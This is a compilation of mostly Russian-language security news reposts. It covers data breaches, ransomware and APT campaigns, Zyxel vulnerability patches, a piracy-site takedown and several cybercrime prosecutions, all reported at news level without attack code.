Атаки на учебные заведения были связаны с использованием устаревшего файлообменного решения Accellion FTA (File Transfer Application). Об этой проблеме мы уже писали неоднократно: в прошлом месяце ИБ-специалисты связали атаки на уязвимые установки Accellion FTA с хак-группой FIN11. Аналитики компании писали, что жертвами злоумышленников на тот момент стали более 100 компаний.
По информации самих разработчиков Accellion, среди примерно 300 клиентов FTA жертвами атак стали «менее 100», а среди них менее 25 пострадали от кражи данных. В FireEye уточняли, что некоторые из этих 25 клиентов подвергаются шантажу, и хакеры требуют у них выкуп.
В рамках этой кампании хакеры эксплуатируют четыре уязвимости в FTA (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103 CVE-2021-27104), а затем устанавливают веб-шелл DEWMODE и используют его для кражи файлов, хранящихся на FTA-устройствах жертв. После этого злоумышленники часто шантажируют пострадавших, требуя выкуп и угрожая слить похищенную информацию в открытый доступ.
Примечательно, что похищенные данные публикуются на сайте, который принадлежит операторам шифровальщика Clop, однако в сетях пострадавших компаний и учреждений не было зашифровано ни одной машины. То есть все они стали жертвами взлома и классического вымогательства, а не атак шифровальщика.
Напомню, что среди других пострадавших числятся: резервный банк Новой Зеландии, комиссия по ценным бумагам и инвестициям Австралии (ASIC), сеть розничных магазинов Kroger, крупнейшая телекоммуникационная компания Сингапура Singtel, нефтегазовый гигант Shell, ИБ-компания Qualys и многие другие.
Еще в феврале представители Университета Колорадо подтверждали, что вуз пострадал от кибератаки через Accellion FTA.
«Хотя полный масштаб атаки еще неизвестен, предварительная информация, полученная в результате расследования, подтверждает, что через эксплуатацию уязвимости, возможно, был получен доступ к нескольким типам данных, включая личную информацию студентов CU Boulder и CU Denver, личную информацию абитуриентов, сотрудников, ограниченные медицинские и клинические данные, а также данные исследований и научных работ», — говорилось в официальном заявлении.
Click to expand...
Хотя ранее университет Майами не сообщал об атаках и утечках данных, учебное заведение использовало службу обмена файлами под названием SecureSend, которая недавно прекратила работу. Судя по URL-адресам, найденным журналистами Bleeping Computer, эта служба тоже работала на базе Accellion FTA.
«Обратите внимание, что защищенное email-приложение SecureSend (secure.send.miami.edu) в настоящее время не работает, а данные, переданные с помощью SecureSend, недоступны», - говорится на странице SecureSend университета.
Click to expand...
Представители университета сообщили журналистам, что уже занимаются расследованием случившегося, уведомили правоохранительные органы и «наняли ведущих экспертов в области кибербезопасности для оказания помощи в расследовании». На сегодняшний день расследование показало, что атака ограничилась только сервером Accellion, но не затронула другие системы университета.
Источник: xakep.ru/2021/03/24/colorado-miami-universities-leak/
Эксперты «Лаборатории Касперского» обнаружили новую кампанию хак-группы Lazarus, направленную на оборонную промышленность. Во время атак хакеры использовали малварь ThreatNeedle, относящуюся к кластеру Manuscrypt (также известен как NukeSped).
Северокорейская хак-группа Lazarus активна как минимум с 2009 года и известна масштабными кампаниями кибершпионажа, атаками на криптовалютный рынок, а также операциями с использованием шифровальщиков. В последние годы группировка сосредоточила свои атаки на финансовых учреждениях по всему миру, однако с начала 2020 года среди целей злоумышленников оказались и предприятия оборонной промышленности.
«Лаборатория Касперского» получила возможность более детально исследовать такую атаку, когда одна из пострадавших организаций обратилась за помощью. Эксперты компании обнаружили в сети пострадавших бэкдор ThreatNeedle, ранее замеченный в атаках на криптовалютные компании.
Начальное заражение происходило посредством фишинга: злоумышленники направляли целям письма с вредоносными документами Microsoft Word или ссылками на такие документы, размещенные на удаленном сервере. В письмах хакеры сделали ставку на актуальную тему — профилактику и диагностику COVID-19. Эти послания были написаны якобы от имени сотрудника медицинского центра, входящего в состав атакованной организации.
Пример фишингового письма
Если пользователь открывал вредоносный документ и разрешал выполнение макросов, малварь приступала к многоэтапной процедуре развертывания, а после установки ThreatNeedle злоумышленники получали практически полный контроль над устройством.
Одна из наиболее интересных деталей этой кампании связана с тем, как злоумышленники преодолели сегментацию сети. Сеть атакованного предприятия была разделена на два сегмента: корпоративный (сеть, компьютеры которой имеют доступ к интернету) и изолированный (сеть, компьютеры которой содержат конфиденциальные данные и не имеют доступа к интернету). При этом, согласно политикам безопасности, любая передача информации между этими сегментами запрещена, то есть они должны быть полностью разделены. Но на деле администраторы имели возможность подключения к обоим сегментам для настройки и оказания технической поддержки пользователям в обеих зонах.
Lazarus удалось получить учетные данные от маршрутизатора, используемого администраторами для подключений к изолированной и корпоративной сетям. Изменив его настройки и установив дополнительное ПО, они смогли превратить его в хостинг для малвари в сети предприятия. После этого маршрутизатор использовался для проникновения в изолированный сегмент, вывода данных из него и отправки их на командный сервер.
Исследователи отмечают, что основной целью данной атаки явно была кража интеллектуальной собственности.
Общая схема атаки
«Lazarus была, возможно, самой активной кибергруппой в 2020 году и, похоже, остается таковой. В январе 2021 года команда анализа угроз Google Threat Analysis Team сообщила, что Lazarus использует тот же бэкдор для атак на исследователей в области кибербезопасности. Мы полагаем, что неоднократно увидим ThreatNeedle в будущем, и продолжим следить за этим бэкдором», — комментирует Сеонгсу Парк (Seongsu Park), старший эксперт команды GReAT.
Click to expand...
«Lazarus — не только сверхактивная группа, но и весьма продвинутая. Злоумышленники не только преодолели сегментацию сети, но и провели тщательное исследование, чтобы создать персонализированную и эффективную фишинговую рассылку и кастомизированные инструменты для передачи украденной информации на удалённый сервер. Предприятиям необходимо принимать дополнительные меры безопасности для защиты от такого рода кампаний кибершпионажа», — добавляет Вячеслав Копейцев, старший эксперт Kaspersky ICS CERT.
Click to expand...
Источник: xakep.ru/2021/02/26/threatneedle/
The ransomware attack against CD Projekt Red was conducted by a ransomware group that goes by the name 'HelloKitty,' and yes, that's the name the threat actors utilize.
Today, CD Project disclosed that they were the target of a ransomware attack that encrypted devices on their network and led to theft of unencrypted files.
Компания Zyxel выпустила патчи для устранения критической уязвимости, которая затрагивает несколько моделей бизнес-маршрутизаторов и потенциально позволяет неаутентифицированным злоумышленникам выполнять инъекции команд. Также Zyxel исправила почти десяток уязвимостей в других своих продуктах.
Самая опасная уязвимость из всех исправленных отслеживается под идентификатором [CVE-2024-7261](https://www.zyxel.com/global/en/support/security- advisories/zyxel-security-advisory-for-os-command-injection-vulnerability-in- aps-and-security-router-devices-09-03-2024) и получила 9,8 балла по шкале CVSS, то есть считается критической. Проблема связана с неправильной обработкой предоставленных пользователем данных, что позволяет удаленным злоумышленникам выполнять произвольные команды в операционной системе хоста.
«Некорректная нейтрализация специальных элементов в параметре host в программе CGI в некоторых моделях точек доступа и маршрутизаторов может позволить неавторизованному злоумышленнику выполнить команды, отправив специально подготовленный cookie на уязвимое устройство», — предупреждают инженеры Zyxel.
Click to expand...
Проблема CVE-2024-7261 затрагивает следующие устройства.
Серия NWA: NWA50AX, NWA50AX PRO, NWA55AXE, NWA90AX, NWA90AX PRO, NWA110AX, NWA130BE, NWA210AX, NWA220AX-6E. Уязвимы все версии прошивки до 7.00, рекомендуется обновиться до 7.00 (ABYW.2) и более поздних версий.
NWA1123-AC PRO: уязвимы все версии прошивки до 6.28, рекомендуется обновиться до 6.28 (ABHD.3) и более поздних версий.
NWA1123ACv3, WAC500, WAC500H: уязвимы все версии прошивки до 6.70, рекомендуется обновление до 6.70 (ABVT.5) и более поздних версий.
Серия WAC: WAC6103D-I, WAC6502D-S, WAC6503D-S, WAC6552D-S, WAC6553D-E, уязвимы все версии прошивки до 6.28, рекомендуется обновиться до 6.28 (AAXH.3) и более поздних версий.
Серия WAX: WAX300H, WAX510D, WAX610D, WAX620D-6E, WAX630S, WAX640S-6E, WAX650S, WAX655E, уязвимы все версии прошивки 7.00, рекомендуется обновление до 7.00 (ACHF.2) и более поздних версий.
Серия WBE: WBE530, WBE660S, уязвимы все версии прошивки до 7.00, рекомендуется обновление до 7.00 (ACLE.2) и более поздних версий.
Также Zyxel сообщает, что маршрутизаторы USG LITE 60AX под управлением V2.00(ACIP.2) тоже подвержены этой проблеме, но эта модель автоматически обновится через облако до версии V2.00(ACIP.3), в которой уже содержится патч для CVE-2024-7261.
Однако критический баг стал не единственной проблемой, которую Zyxel устранила на этой неделе. Так, производитель предупредил о семи дополнительных уязвимостях, затрагивающих некоторые серии файрволлов, включая ATP, USG-FLEX и USG FLEX 50(W)/USG20(W)-VPN:
CVE-2024-6343 (4,9 балла по шкале CVSS): переполнение буфера в CGI, которое позволяет аутентифицированному злоумышленнику с привилегиями администратора вызвать отказ в обслуживании путем отправки специально подготовленных HTTP- запросов;
CVE-2024-7203 (7,2 балла по шкале CVSS): инъекция команд после аутентификации, которая позволяет аутентифицированному злоумышленнику с правами администратора запускать команды, выполняя специально подготовленные команды CLI.
CVE-2024-42057 (8,1 балла по шкале CVSS): инъекция команд в IPSec VPN, которая позволяет неаутентифицированному злоумышленнику выполнять команды путем отправки поддельного имени пользователя (атака будет успешной только в том случае, если устройство настроено на аутентификацию User-Based-PSK и имеет пользователя с именем длиной более 28 символов).
CVE-2024-42058 (7,5 балла по шкале CVSS): разыменование нулевого указателя в некоторых версиях межсетевых экранов, которое позволяет неаутентифицированному злоумышленнику осуществлять DoS-атаки путем отправки модифицированных пакетов.
CVE-2024-42059 (7,2 балла по шкале CVSS): инъекция команд после аутентификации, которая позволяет аутентифицированному злоумышленнику с правами администратора выполнять команды на пораженном устройстве, загрузив через FTP сжатый языковой файл.
CVE-2024-42060 (7,2 балла по шкале CVSS): инъекция команд после аутентификации, которая позволяет аутентифицированному злоумышленнику с правами администратора выполнять команды, загрузив на уязвимое устройство модифицированный файл внутреннего пользовательского соглашения.
CVE-2024-42061 (6,1 балла по шкале CVSS): отраженная XSS CGI dynamic_script.cgi, которая позволяет злоумышленнику обманом вынудить пользователя перейти по подготовленному URL-адресу с XSS-пейлоадом. Атакующий сможет получить информацию о браузере, если вредоносный скрипт выполнится в браузере жертвы.
Еще одна уязвимость (CVE-2024-5412,7,5 балла по шкале CVSS) была выявлена в 50 продуктах Zyxel, включая некоторое клиентское оборудование, оптоволоконные терминалы и маршрутизаторы. Проблема связана с переполнением буфера в библиотеке libclinkc и позволяет неавторизованному атакующему провести DoS- атаку путем отправки модифицированных HTTP-запросов.
Новость с сайта xakep.ru - https://xakep.ru/2024/09/05/zyxel-patches-3/
Голливудские студии добились разгрома сети пиратских интернет-кинотеатров с миллиардами посетителей, не дававшей им покоя с 2016 г. Fmovies и родственные ему веб-ресурсы не работают с конца июня 2024 г. Свои руки к этому приложили вьетнамская полиция и американские отраслевые организации MPA и ACE.
Прощай, Fmovies!
Власти Вьетнама и отраслевая ассоциация ACE (Alliance for Creativity and Entertainment), представляющая интересы 30 глобальных компаний в сфере развлечений, разгромили популярнейший пиратский онлайн-кинотеатр Fmovies, пишет TorrentFreak. Площадка и связанные с ней проекты, аудитория которых насчитывала миллиарды посетителей, едва ли не одномоментно прекратили свою работу.
Стриминговая платформа Fmovies, начавшая свою работу в 2016 г., на протяжении всего своего существования была для голливудских студий как бельмо на глазу. Правообладатели, как правило, предпочитают не упоминать названия конкретных пиратскик площадок в публичном поле, чтобы нее обеспечивать им дополнительную бесплатную рекламу, однако Fmovies стала исключением из этого правила.
Степень недовольства правообладателей процветанием сервиса ярко иллюстрирует тот факт, что к борьбе с ним пытались привлечь Конгресс США. В декабре 2023 г. членам американского парламента было продемонстрировано на практике то, с какой легкостью можно организовать просмотр нелегально распространяемого видео в любой точке мира, даже в таком неприступном месте как Капитолий. С работой сайта Fmovies конгрессменов тогда ознакомила лично старший исполнительный вице-президент Ассоциации кинокомпаний (Motion Picture Association; MPA) Карин Темпл (Karyn Temple).
Крах империи
Первые признаки скорого краха «империи» Fmovies проявились в конце июня 2024 г. Примерно в это время по неизвестным причинам прекратилось наполнение основного сайта новым контентом. Всего пару недель спустя сервис и вовсе прекратил свою работу – без какого-либо официального объяснения со стороны администрации.
Как отмечает TorrentFreak, далее, в полном соответствии с принципом домино, один за другим начали закрываться второстепенные стриминговые порталы, связанные с Fmovies. Поначалу их посетители автоматически перенаправлялись на «новые» пиратские площадки, однако буквально на днях и эти веб-ресурсы перестали быть доступными – вновь без какого-либо уведомления о готовящемся закрытии или переносе площадок на другие домены.
Один из родственных Fmovies сайтов blifxz.to на опустевшей главной странице тогда разместил текстовое сообщение, являющееся дословным повторением слов, опубликованных другой пиратской площадкой – 123Movies – после закрытия, за шесть лет до этого. В нем администрация ресурса благодарила аудиторию портала за лояльность и призывала отныне оплачивать просмотр фильмов и сериалов, таким образом выражая признательность людям, стоящим за производством соответствующего контента.
Выбор идентичного по форме и содержанию душеспасительного послания администрацией blifxz.to может быть неслучайным. Не исключено, что за обеими площадками стоят одни и те же люди, или сеть веб-ресурсов Fmovies управлялась идейные продолжатели дела 123Movies, о чем косвенно свидетельствует тот факт, что Fmovies был запущен и обрел огромную популярность именно после кончины 123Movies. Кроме того, следы обеих базовых площадок ведут во Вьетнам.
Масштабная кампания по зачистке интернета от пиратского контента затронула не только ресурсы, распространяющие «традиционный» контент в формате полнометражного кино и телевизионных сериалов. Досталось, к примеру, и крупной пиратской площадке для любителей японских комиксов и анимации AniWave с ежемесячной аудиторией в 170 млн посетителей на пике популярности.
Некоторое время причины внезапного закрытия ряда популярных пиратских площадок оставались загадкой, поскольку никто из участников процесса не брал на себя ответственность за случившееся. Логично было предположить, что владельцы видеосервисов по собственной инициативе не стали бы забрасывать прибыльный бизнес, следовательно, площадки прекратили свое существование под воздействием внешних факторов.
В последние несколько недель MPA и ACE хранили гробовое молчание, однако недавний визит представителей этих организаций в Ханой (Вьетнам), где в середине июня состоялся четырехдневный международный симпозиум, посвященный защите прав интеллектуальной собственности, может свидетельствовать о том, к закрытию Fmovies могли приложить руку американские правообладатели и правоохранительные органы Вьетнама.
Карты раскрыты
29 августе 2024 г. ACE опубликовала на своем официальном сайте пресс-релиз, в котором объявила о разгроме «крупнейшей пиратской группировки» силами ханойской полиции. По его итогам прекратили свое существование AniWave, Bflixz, Flixtorz, Movie7, Myflixer, входившие в сетку веб-ресурсов Fmovies.
По заявлению ACE, пиратские ресурсы Fmovies только в период с января 2023 г. по июнь 2024 г. собрали более 6,7 млрд посетителей. Кроме того, в ходе расследования была установлена связь площадки с видеохостингом vidsrc, который также прекратил подавать признаки жизни на этой неделе, что отразилось на работе более скромных с точки зрения размера аудитории пиратских стриминговых сервисов.
Чарльз Ривкин (Charles Rivkin), генеральный директор MPA и председатель совета директоров ACE назвал уничтожение Fmovies «потрясающей победой для актеров, съемочных групп, сценаристов, режиссеров, студий и творческого сообщества по всему миру».
Примечательно, что в опубликованных ACE материалах нет ни слова о людях, стоявших за сетью веб-ресурсов Fmovies: имена подозреваемых не упоминаются, о задержаниях не сообщается. Нельзя исключать того, что не все участники пиратской группировки к моменту публикации пресс-релиза были установлены правоохранительными органами Вьетнама.
Стартап StakeHound лишился контроля над 38 178 ETH, переданных на хранение израильскому криптокастодиану Fireblocks. Эта сумма, равная $76 млн по текущему курсу, была собрана с инвесторов, планирующих стать валидаторами сети Ethereum 2.0.
В ноябре 2020-го года был запущен депозитный смарт-контракт ETH 2.0 для размещения средств PoS-майнеров, который привлек на сегодняшний день $11 млрд.
StakeHound не доверил ключи от кошелька компании Fireblocks, они выдавались только на время работы с кошельком. Последняя из таких операций закончилась случайным удалением, как оказалось, их единственной копии.
По версии StakeHound, программисты Fireblocks не сделали все необходимые операции по бэкапу ключей при переносе активов на новый адрес. Копии направлялись в компанию Coincover, но они были защищены мультиподписью, которая по каким-то причинам была утеряна специалистом Fireblocks.
В свою очередь Fireblocks обращает внимание, что речь идет про перенос средств в депозитный контракт Ethereum 2.0. Он работает в сайдчейне нулевой фазы Beacon Chain с которой кастодиан пока не имеет дело. Программисты Fireblocks разработали приложение специально для StakeHound, где и создаются пароли для мультиподписи.
Иными словами, ответственность за создание пароля лежит на инвестиционном стартапе. Оригинальный ключ утерян Fireblocks, а резервная копия, что находится на хранении Coincover не работает по причине отсутствия мультиподписи.
Передач контроля над депозитом третьему лицу, позволила StakeHound подать в суд Израиля иск к кастодиану Fireblocks по месту его юридической прописки. Теперь судебной системе предстоит выяснить меру ответственности за хранения криптовалют. Приговор может изменить правила предоставления услуг “холодных хранилищ” по всему миру.
Киберполиция разоблачила 26-летнего харьковчанина в неправомерном использовании электронных денег.
Как сообщили в УПК в Харьковской области ДК НПУ, для этого он создал и администрировал сайт, на котором рекламировал услуги по онлайн-обмену электронных денег, криптовалюты и проводил финансовые операции с электронными деньгами российских платежных систем, запрещенных на территории Украины.
Для повышения прибыльности онлайн-обменника фигурант осуществлял D-dos атаки на сайты по предоставлению онлайн-обмена своих конкурентов. Для этого злоумышленник использовал собственные Телеграмм-аккаунты, наличные выдавал клиентам через собственную сеть стационарных пунктов обмена валют в Харькове. Желающие осуществить финансовые операции с электронными деньгами оформляли заявку на Телеграмм-канале злоумышленника. Клиент перечислял средства на банковский счет мужчины в национальной валюте и получал эквивалент на электронные или криптокошельки запрещенных платежных систем или получал наличные в пункте обмена валют. «Обычно указанные электронные платежные системы используются преступными элементами для противоправной деятельности и отмывания средств, полученных преступным путем, в связи с невозможностью отслеживания их происхождения правоохранительными органами», - отметили в Киберполиции.
Правоохранители провели обыски по месту жительства фигуранта, пунктах обмена валют, в результате чего изъяли компьютерную технику, терминалы мобильной связи и деньги в размере около 3 млн грн.
По данному факту возбуждено уголовное производство по ч. 2 ст. 200 (незаконные действия с документами на перевод, платежными карточками и другими средствами доступа к банковским счетам, электронными деньгами, оборудованием для их изготовления), ч. 3 ст. 190 (мошенничество, совершенное в крупных размерах, или путем незаконных операций с использованием электронно-вычислительной техники), ч. 2 ст. 361 (несанкционированное вмешательство в работу электронно- вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи, что привело к утечке, потере, подделке, блокированию информации, искажению процесса обработки информации или к нарушению установленного порядка ее маршрутизации) Уголовного кодекса Украины. Харьковчанину грозит лишением свободы на срок до восьми лет.
• Source: https://xk5.com.ua/news.php?id=132920
В январе 2021 года пользователи и СМИ заметили, что неисправленный баг нулевого дня в Windows 10 (и более старых версиях ОС, включая Windows XP) позволяет повредить структуру файловой системы NTFS с помощью однострочной команды. Проблему еще в прошлом году обнаружил ИБ-исследователь Джонас Ликкегаард. В августе и октябре 2020 года он уже пытался привлечь внимание к этому багу, однако добился успеха лишь в 2021 году.
Срабатывание бага и повреждение NTFS можно спровоцировать, если просто попытаться получить доступ к атрибуту NTFS $i30 определенным образом. Ниже можно увидеть пример такой опасной однострочной команды. Предупреждаем: не проверяйте работу бага на собственной работающей системе, лучше используйте для этого виртуальную машину!

Эксплоит для этой проблемы можно спрятать внутри файла ярлыка, ZIP-архива, batch-файлов и так далее, и такие файлы вызывали моментальное повреждение структуры файловой системы.
Хотя инженеры Microsoft объясняли, что диск на самом деле не поврежден, и chkdsk успешно устранит проблему, некоторые пользователи сообщали, что у них chkdsk не справился с задачей, а Windows 10 все равно отказалась загружаться.
Предполагалось, что исправление для этой ошибки появится в феврале, но этого не произошло. Тогда разработчики Mozilla добавили вFirefox 85.0.1 специальную проверку для предотвращения доступа к проблемному пути, а специалисты компании OSR подготовили для этой ошибки неофициальный опенсорсный патч.
Теперь же в инсайдерскую сборку Windows 10 21322 наконец было добавлено исправление, которое предотвращает доступ к проблемному пути. Если попытаться выполнить приведенную выше команду, система ответит «Недопустимое имя каталога» и более не будет помечать диск, как поврежденный.

Но, к сожалению, пока патч попал только в Windows 10 Insider «Dev», но не в Windows 10 21H1 «Beta», которая должна выйти этой весной.
Источник: xakep.ru/2021/03/01/patch-for-ntfs-bug/
Компания Kawasaki Motors Europe (KME) подтвердила, что стала жертвой недавней атаки с использованием вируса- вымогателя , которая привела к значительным перебоям в обслуживании, поскольку преступники угрожали раскрыть украденные данные.
«В начале сентября компания Kawasaki Motors Europe (KME) подверглась кибератаке, которая, хотя и не увенчалась успехом, привела к временной изоляции серверов компании до тех пор, пока позднее в тот же день не был запущен стратегический план восстановления», — говорится в заявлении компании.
После атаки печально известная группа Ransomware-as-a-Service (RaaS) RansomHub слила 478 ГБ данных, которые, как она утверждает, принадлежат веб-сайту KME. Были раскрыты критически важные деловые документы, такие как банковские записи, внутренняя переписка, данные о дилерах и финансовая информация.
Раскрытые данные были размещены на вымогательском сайте банды в даркнете, что говорит о том, что KME отказалась платить выкуп, требуемый группировкой.
RansomHub приобрел известность с момента своего появления в феврале 2024 года, став одной из самых плодовитых групп RaaS, заявившей о 75 атаках с требованием выкупа во втором квартале 2024 года. Среди ее жертв есть такие [высокопоставленные организации,](https://www.techradar.com/pro/security/yet- another-hacker-group-demands-ransom-from-change-healthcare) как Change Healthcare и Planned Parenthood.
Агентство по кибербезопасности и инфраструктуре США (CISA) опубликовало
рекомендательное предупреждение об этом субъекте угрозы и его тактике, в
котором изложены индикаторы компрометации (IoC) в целях снижения рисков для
потенциальных целей.
Растет не только число групп RaaS, но и требования выкупа стремительно растут:
среднестатистический злоумышленник [запрашивает ошеломляющие $1,5
млн](https://www.techradar.com/pro/ransomware-demands-exponentially-increase-
averaging-1-5-million-this-year) в обмен на украденные данные компании. В 2023
году эта сумма составляла всего $200 000, что указывает на мощь групп
вымогателей и ущерб, который они могут нанести организации.
This marks the second credential-stuffing attack to hit the streaming platform in the last few months.
Spotify suffered a credential-stuffing attack that used stolen credentials
from some 100,000 user accounts, a security researcher discovered.
This is the second credential-stuffing attack to affect the music platform in
the past couple of months. Last November, 300,000 accounts were affected when
an Elasticsearch database containing more than 380 million records and login
credentials was used to target Spotify accounts. It's believed this data was
collected from previously breached platforms, [researchers
said](https://hotforsecurity.bitdefender.com/blog/over-300000-spotify-
accounts-compromised-in-credential-stuffing-attack-24581.html) at the time.
Security researcher Bob Diachenko says in the latest incident, the attackers
tried to use a malicious Spotify logger
database. He
identified a database containing more than 100,000 account details, likely
leaked from somewhere else, that attackers used to target Spotify user
accounts.
The attack was reported to Spotify, which issued a password reset to affected
users that rendered the public credentials invalid. The company says in a
statement it also worked to have the fraudulent database taken down by its
Internet service provider, and notes this attack was not linked to a breach in
Spotify's security.
Users are advised to choose unique passwords for online services. In a blog post, security firm Bitdefender notes it doesn't matter much if users choose a complex password, if that password is reused across websites.
Под покровом глубокой ночи, на одну из бензозаправочных станций в Киевской области подъехал автомобиль Hyundai i30. Водитель направил машину к колонке с терминалом самообслуживания и вставил заправочный пистолет в люк бензобака.
Убедившись, что за ним никто не наблюдает, молодой человек достал ноутбук, подключился к интернету и, получив доступ к программному обеспечению, управляющему терминалом, ввел специальный код, который позволил ему залить в бак 50 литров бензина совершенно бесплатно.
Спустя пару дней, злоумышленник снова посетил эту АЗС посреди ночи, уже на другом автомобиле (Dacia Logan). И снова он повторил действия, которые позволили совершенно безвозмездно заправить в бак 50 литров топлива.
Обнаружив недостачу горючего, администрация АЗС обратилась с заявлением в полицию, которая возбудила уголовное дело №12020110040000004 по статье 185 УК Украины (кража). В ходе расследования была установлена личность подозреваемого, который оказался жителем Киева, работающим в компании, которая разрабатывает системные решения по осуществлению контроля и учета для газо- и нефтехранилищ.
Работая оператором по обработке информации специальной компьютерной системы, разработанной для учета и самообслуживания автозаправочных станций, он превысил служебные полномочия тем, что использовал известные ему параметры бесплатного отпуска топлива.
Курьез заключается в том, что на сайте самой компании, предлагающей информационные системы для АЗС, говорится: «там, где установлено наше контрольно-измерительное оборудование и программное обеспечение, кражи и мошенничество – практически невозможны».
В суде обвиняемый полностью признал вину и объяснил свой поступок стремлением неправомерного обогащения. Он искренне раскаялся в содеянном, хотя это и не помогло ему ни сохранить работу, ни избежать уголовной ответственности.
Внимательно изучив личность обвиняемого и его карьерный прорыв из айтишника в воры, суд постановил присудить наказание в виде 3 лет лишения свободы. Учитывая искреннее раскаяние, отсутствие прежних судимостей и то, что обвиняемый не состоит на учете нарколога, судья принял решение, что исправление подсудимого возможно без изоляции его от общества. В результате, 3 года тюрьмы были заменены на 1 год испытательного срока.
• Source: reyestr.court.gov.ua/Review/97412627
Известный в киберпреступных кругах рэпер Punchmade Dev действительно имеет отношение к незаконной деятельности, а сам он живет в небольшом по американским меркам городе в штате Кентукки. К таким выводам пришел по итогам небольшого расследования известный ИБ-журналист Брайан Кребс (Brian Krebs).
«Некоторое время назад различные аккаунты Punchmade в социальных сетях начали продвигать новый интернет-магазин, который продает украденные платежные карты и идентификационные данные, а также доступы к финансовым счетам и программное обеспечение для изготовления поддельных чеков», — написал Кребс.
Официальный аккаунт Punchmade Dev в Instagram содержит ссылку на многие сторонние площадки, связанные с исполнителем, одна из них расположена по адресу mainpage[.]me/punchmade. Там указываются сведения о так называемой «Империи Punchmade»: более 200 тысяч подписчиков в Telegram-канале @whopunchmade и ссылка на платформу punchmade[.]atshop[.]io, на которой можно приобрести взломанные банковские счета и платежные карты с большим балансом. Например, за 80 долларов покупатель получит вход в учетные записи Cash App с балансом от 3000 до 5000 долларов.
Пытаясь определить настоящее имя рэпера, Кребс обратил внимание на одну из его фотографий с несколькими ожерельями и цепочками на груди. Одно из них стало путем к разгадке: это были логотип и талисман Университета Кентукки. В своем профиле Spotify исполнитель указывал, что еще в 2021 году запустил лейбл под названием Punchmade Records. Поиск компаний, включающих сочетание «punchmade» на сайте государственного секретаря Кентукки, выдает только одну запись: OBN Group LLC в городе Лексингтон. Она датирована ноябрем 2021 года и включает сертификат о предполагаемом названии бренда — Punchmade LLC.
Главой это компании значится местный житель Девон Тернер (Devon Turner). С ним связана другая ныне несуществующая компания, упоминания о которой сохранились на том же сайте госсекретаря штата — DevTakeFlightBeats Inc. В сервисе Constella Intelligence есть упоминание о том, что Девон Тернер из Лексингтона (штат Кентукки), использовал адрес электронной почты obndevpays@gmail[.]com. Поиск по нему на DomainTools показывает, что с его помощью на имя Тернера был зарегистрирован домен everpunchmade[.]com, а старая копия сайта содержит упоминания о продаже брендовых футболок и сувениров Punchmade Dev.
В ходе дальнейшего расследования Кребсу удалось выяснить, что рэпер родился в
октябре 2000 года и был старшим ребенком у матери-одиночки пятерых детей. Он
играл в баскетбол и футбол в старшей школе, а также занимался легкой
атлетикой, но променял это все на видеоигры, в которых достиг определенных
успехов. Сам Тернер на запрос журналиста не ответил.
sc: krebsonsecurity[.]com/2024/01/e-crime-rapper-punchmade-dev-debuts-card-
shop
На Западном побережье, где русскоязычный криминальный тон все чаще задают эмигранты из Армении, которых все реже называют «русскими».
Как сообщила федеральная прокуратура Центрального округа Калифорнии в Лос- Анджелесе, 11 марта там арестовали трех предполагаемых членов группы «вирусных мошенников» из долины Сан-Фернандо. В тот же день 27-летнего Манука Григоряна (он же Манук Кудимов) из лос-анджелесского пригорода Сан-Вэлли, Эдварда Пароняна из пригорода Гранада-Хиллс и 41-летнего Ваху Дадяна из пригорода Глендейл доставили в суд, где обвинили и освободили под залоги с обязательством явиться 4 мая. Четвертый обвиняемый, 38-летний Армен Хайрапетян из Глендейла, пока в розыске, а их сообщники: 42-летний Ричард Айвазян и его 36-летняя жена Мариэтта Терабелян, а также 40-летний Артур Айвазян (брат Ричарда) и его 39-летняя супруга Тамара Дадян были арестованы, обвинены и освобождены под залог в ноябре прошлого года. До решения суда все они считаются невиновными, но обвинения грозят им лишением свободы сроком до 30 лет.
Все восемь подсудимых обвиняются в мошенничестве с переводами и банками, а также в похищении личных данных и в отмывании денег, причем все это связано с федеральными программами финансовой помощи жертвам COVID-19. В обвинении, которое было предъявлено в прошлом году и перепредъявлено в этом, утверждается, что подсудимые пользовались программой предоставления займов пострадавшим от стихийного бедствия (Economic Injury Disaster Relief Program или EIDL), гарантированных федеральным Управлением по делам малого бизнеса (Small Business Administration или SBA), а также Программой помощи зарплате (Paycheck Protection Program или PPP), а всё это по Закону помощи от коронавируса, поддержки и экономической защиты (Coronavirus Aid, Relief, and Economic Security (CARES) Act). Пострадавшим от коронавируса малым и средним бизнесам предоставлялись льготные займы под 2,5-4% в год, причем в первый год проценты по ним можно было не выплачивать. На это в марте 2020 года было выделено 349 млрд долларов, а через месяц еще 300 млрд. Но если заявитель получал заем по программе PPP, ему не полагалась помощь по EIDL.
Злоупотребляя этими программами, подсудимые, как гласит обвинение, «подали и способствовали подаче минимум 151 ложного заявления на помощь на общую сумму минимум 21,9 млн долларов у SBA и минимум 18 млн долларов у PPP». Для этого они «пользовались ложными, крадеными или синтетическими (то есть комбинированными – А.Г.) данными... для подачи заявлений на займы, гарантированные SBA по программе EIDL, и программой PPP по закону CARES». Подсудимые также подавали заявления от себя лично, называя ложные или вымышленные бизнесы, а в доказательство часто приводя ложные документы, налоговые данные и ведомости зарплаты.
Полученные по этим программам минимум 4,6 млн долларов они, предположительно, тратили не на поддержку бизнесов, а на себя, в частности, сделав первый взнос на покупку за 3,25 млн долларов дома в лос-анджелесском районе Тарзана, дома за 1 млн долларов в Глендейле и дома в городе Палм-Десерт. Помимо этого они инвестировали незаконно полученные деньги в золотые монеты, криптовалюту, акции и бриллианты, а также покупали дорогие часы, ювелирные изделия, импортную мебель и одежду. В предъявленном 11 марта обвинении добавлено, что обвиненные в ноябре прошлого года Ричард Айвазян и Тамара Дадян продолжали совершать преступления после ареста освобождения под залог. Айвазян отмывал деньги, вкладывая их в криптовалюту и ценные бумаги под псевдонимом «Юлия Жадко», а Тамара несколько раз лгала банку, чтобы незаконно получить положенные жертвам коронавируса займы, замороженые на счете, который она раньше открыла на украденные личные данные.
